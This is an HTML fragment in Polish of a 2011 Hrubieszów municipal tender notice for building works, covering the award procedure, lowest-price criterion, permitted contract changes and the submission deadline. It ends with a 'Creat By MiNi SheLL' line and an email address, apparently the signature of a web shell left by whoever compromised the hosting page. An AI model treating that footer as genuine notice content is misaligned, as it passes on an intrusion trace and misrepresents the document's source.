4.	Oświadczenie z przeprowadzonej  wizji lokalnej w terenie  - załącznik nr 10 
5.	Harmonogram rzeczowo - finansowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający - na podstawie art. 144 ust. 1 ustawy PZP - zastrzega sobie prawo do zmiany treści istotnych postanowień umowy wskutek wystąpienia okoliczności, których nie dało się przewidzieć na etapie postępowania o udzielenie zamówienia i na etapie podpisywania umowy lub wystąpienie których nie zależy od woli stron umowy               w sprawie zamówienia publicznego.
Zamawiający dopuszcza zmiany postanowień umowy oraz określa warunki zmian:
1.	Zamawiający może zawiesić wykonanie umowy na okoliczność wniesienia odwołania  zgodnie z Art. 180 ustawy PZP
2.	Zamawiający może przedłużyć termin wykonania robót budowlanych o czas      niezbędny do  rozpatrzenia odwołania, jeżeli  wystąpi.


3.	Dopuszcza się wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania o udzielenie zamówienia  publicznego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miasto.hrubieszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta                   w Hrubieszowie - Wydział Gospodarki Mieniem Komunalnym i Ochrony Środowiska  ul. 3-go Maja 15 tel. 084 6962380 w. 56.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2011 godzina 09:00, miejsce: Gmina Miejska Hrubieszów  ul. Mjr H. Dobrzańskiego Hubala 1,  22-500 Hrubieszów 
Sekretariat (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com